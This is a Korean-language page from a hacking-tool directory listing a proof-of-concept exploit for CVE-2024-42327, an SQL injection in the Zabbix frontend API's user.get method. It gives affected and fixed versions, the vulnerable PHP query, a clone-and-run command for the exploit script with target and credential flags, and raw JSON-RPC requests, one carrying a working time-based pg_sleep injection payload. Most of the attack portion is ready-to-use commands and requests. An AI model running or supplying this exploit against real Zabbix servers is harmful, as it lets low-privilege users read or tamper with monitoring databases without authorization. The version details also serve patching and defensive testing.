Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-42327 — CVE-2024-42327에 대한 개념 증명 익스플로잇으로, Zabbix frontend API의 SQL 인젝션 취약점으로 비관리자 사용자가 user.get 메서드를 통해 임의의 SQL 쿼리를 실행할 수 있습니다. | Kitploit
도구/GitHubGitHub/depers-rus/cve-2024-42327
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubdepers-rus/cve-2024-42327

CVE-2024-42327

CVE-2024-42327에 대한 개념 증명 익스플로잇으로, Zabbix frontend API의 SQL 인젝션 취약점으로 비관리자 사용자가 user.get 메서드를 통해 임의의 SQL 쿼리를 실행할 수 있습니다.

저장소 보기
31년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-42327 / ZBX-25623에 대한 PoC 및 익스플로잇

Zabbix 프론트엔드에서 기본 User 역할 또는 API 액세스 권한을 부여하는 다른 역할을 가진 비관리자 사용자 계정이 이 취약점을 악용할 수 있습니다. CUser 클래스의 addRelatedObjects 함수에 SQLi가 존재하며, 이 함수는 API 액세스 권한이 있는 모든 사용자가 사용할 수 있는 CUser.get 함수에서 호출됩니다.

изображение

취약한 버전: 6.0.0 - 6.0.31, 6.4.0 - 6.4.16, 7.0.0

수정된 버전: 6.0.32rc1, 6.4.17rc1, 7.0.1rc1

취약한 코드

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

익스플로잇 사용법:

root@kitploit:~
git clone https://github.com/depers-rus/CVE-2024-42327
python3 cve-2024-42327-PoC.py -t zabbix.xyz.ru -u "depers" -p "passwd"

요청:

root@kitploit:~
POST /api_jsonrpc.php  HTTP/1.1
Host: zabbix.xyz.ru
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/json

{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole": ["roleid,{SQLi payload}"
], "userids": ["10"
]}, "auth": "---auth_token---", "id": 1}

BurpSuite PoC (시간 기반 SQLi)

root@kitploit:~
SELECT pg_sleep(10)) AS DELAY
root@kitploit:~
POST /api_jsonrpc.php  HTTP/1.1
Host: zabbix.xyz.ru
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/json

{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole": ["roleid,(SELECT pg_sleep(10)) AS DELAY"
], "userids": ["10"
]}, "auth": "---auth_token---", "id": 1}

증명

изображение

참고 자료

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
도구 다운로드